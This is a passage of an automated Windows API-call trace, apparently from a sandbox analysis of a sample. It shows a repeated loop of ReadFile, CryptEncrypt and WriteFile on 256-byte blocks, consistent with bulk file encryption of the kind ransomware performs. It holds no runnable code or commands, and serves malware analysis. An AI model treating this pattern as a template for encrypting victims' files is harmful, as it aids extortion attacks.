lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.338] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.338] GetLastError () returned 0x0 [0163.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.338] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.338] GetLastError () returned 0x0 [0163.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.338] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.339] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.339] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.339] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.339] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.339] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.339] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.339] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.339] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.340] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.340] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.340] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.340] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.340] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.340] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.340] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.340] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.340] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.340] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.340] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.340] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.340] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.340] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.340] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.340] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.340] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.340] GetLastError () returned 0x0 [0163.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.341] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.341] GetLastError () returned 0x0 [0163.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.341] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.341] GetLastError () returned 0x0 [0163.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.341] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.341] GetLastError () returned 0x0 [0163.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.341] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.341] GetLastError () returned 0x0 [0163.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.341] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.341] GetLastError () returned 0x0 [0163.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.341] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.341] GetLastError () returned 0x0 [0163.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.341] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.342] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.342] GetLastError () returned 0x0 [0163.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.342] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.342] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.342] GetLastError () returned 0x0 [0163.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.342] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.342] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.342] GetLastError () returned 0x0 [0163.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.342] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.342] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.342] GetLastError () returned 0x0 [0163.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.342] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.342] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.342] GetLastError () returned 0x0 [0163.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.342] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.342] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.342] GetLastError () returned 0x0 [0163.342] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.342] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.343] GetLastError () returned 0x0 [0163.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.343] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.343] GetLastError () returned 0x0 [0163.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.343] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.343] GetLastError () returned 0x0 [0163.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.343] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.343] GetLastError () returned 0x0 [0163.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.343] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.343] GetLastError () returned 0x0 [0163.343] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.343] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.343] CryptEncrypt (in: 